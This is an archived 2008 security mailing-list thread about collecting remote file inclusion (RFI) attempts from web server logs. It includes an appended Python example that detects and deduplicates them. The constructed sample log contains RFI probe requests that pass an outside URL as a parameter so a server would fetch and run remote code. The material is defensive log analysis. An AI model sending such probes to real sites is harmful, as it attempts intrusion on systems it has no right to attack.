[VIM] RFI BotNet and phpBB 0-day?

Noam Rathaus noamr at beyondsecurity.com
Thu Mar 20 18:31:23 UTC 2008


Hi,

A while ago I wrote a Perl script that goes through the Apache logs and 
captures anything that looks like an RFI attack.

The problem is, as you guys mentioned, that:
1) Some RFI aren't RFI; they are people that mistype URLs, or double-paste 
URLs, etc.
2) Some RFI attacks are not viable - rather people testing things out ... like 
you probably try to SQL inject any site that has a nice number in the URL :)
3) Some RFI attacks are so automated that they will try to attack you even if 
you don't have anything installed on your computer.

If anyone wants this script I can send it over and they can look at the effort I 
put in.

(BTW: The Perl script also sorts and returns unique RFI attacks - in order to 
minimize the 100k+ RFI our site sees every month.)

On Thursday 20 March 2008 20:12:32 security curmudgeon wrote:
> : If you're bored I have a few RFIs for you to go through :)
> :
> : # wc -l todays-rfi-bots.txt
> :    44737 todays-rfi-bots.txt
> :
> : The file will show the number of unique entries that have hit milw0rm in
> : the past 24 hours requesting http inclusions.  People forget to remove
> : milw0rm from their rfi scans.
>
> Hah, this is what I was thinking of doing but automating it more to pull
> them out nightly. If time permitted, I was going to get fancy and have it
> weed out known vulnerabilities. If not, I wonder if there are a few folks
> that could check them if we mail them here with a little research already
> done.
>
> Obviously we all want to track vulnerabilities in our respective
> databases, but these are of specific interest for several reasons.
> Primarily, they are being actively exploited in the wild and would qualify
> for 'undercover vulnerabilities' [1].
>
> I'm also curious if these suffer from the 'grep and gripe' false positives
> that we see on the mail lists, and if the botnet is essentially trying to
> do inclusions on scripts that aren't really vulnerable in the first place.
>
> .b
>
> [1] http://osvdb.org/blog/?p=227



-- 
Noam Rathaus
CTO
noamr at beyondsecurity.com
http://www.beyondsecurity.com

"Know that you are safe."

Beyond Security Finalist for the "Red Herring 100 Global" Awards 2007
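As an added example (not the Perl script mentioned above, which is not part of this post), here is a Python version of the same log pass: it flags query-string values that are absolute URLs, drops the ones that point back at the site's own host (the mistyped or double-pasted case), and collapses the rest to unique script/URL pairs with hit counts. The log lines, IP addresses and host names are constructed for the example.

```python
import re
from collections import Counter
from urllib.parse import parse_qsl, unquote, urlsplit

# One Apache "combined" log line: client ident user [time] "METHOD target proto" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# A query value that is itself an absolute URL is the classic RFI indicator.
SCHEME_RE = re.compile(r'^(?:https?|ftps?)://', re.IGNORECASE)

# Constructed sample log (not real traffic): two bot probes of the same script,
# one URL-encoded probe of another script, one double-pasted URL, one normal hit.
SAMPLE_LOG = """\
203.0.113.7 - - [20/Mar/2008:10:11:12 +0000] "GET /index.php?page=http://198.51.100.9/id.txt? HTTP/1.1" 404 211 "-" "libwww-perl/5.805"
203.0.113.7 - - [20/Mar/2008:10:11:13 +0000] "GET /forum/viewtopic.php?path=http%3A%2F%2F198.51.100.9%2Fid.txt%3F HTTP/1.1" 404 211 "-" "libwww-perl/5.805"
198.51.100.22 - - [20/Mar/2008:10:12:01 +0000] "GET /index.php?page=http://www.example.org/index.php?page=home HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
192.0.2.5 - - [20/Mar/2008:10:13:44 +0000] "GET /index.php?page=home HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
203.0.113.8 - - [20/Mar/2008:10:14:02 +0000] "GET /index.php?page=http://198.51.100.9/id.txt? HTTP/1.1" 404 211 "-" "libwww-perl/5.805"
"""


def rfi_candidates(line, own_hosts=()):
    """Return [(script_path, included_url)] for each query parameter whose
    URL-decoded value is an absolute URL.  Values whose host is one of
    own_hosts are dropped: those are usually mistyped or double-pasted links
    rather than attacks (point 1 in the post above)."""
    m = LOG_RE.match(line)
    if not m:
        return []
    parts = urlsplit(m.group("target"))
    own = {h.lower() for h in own_hosts}
    hits = []
    for _name, value in parse_qsl(parts.query, keep_blank_values=True):
        value = unquote(value)  # parse_qsl decoded once; catch double-encoding too
        if not SCHEME_RE.match(value):
            continue
        if (urlsplit(value).hostname or "").lower() in own:
            continue
        hits.append((parts.path, value))
    return hits


def unique_rfi(log_text, own_hosts=()):
    """Collapse a log into unique (script, include URL) pairs with hit counts,
    most frequent first, so 100k+ probes reduce to the few worth a look."""
    counts = Counter()
    for line in log_text.splitlines():
        for hit in rfi_candidates(line, own_hosts):
            counts[hit] += 1
    return sorted(counts.items(), key=lambda kv: (-kv[1], kv[0]))
```

With own_hosts set to the site's own name, the sample collapses to two unique probes, one of them seen twice.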

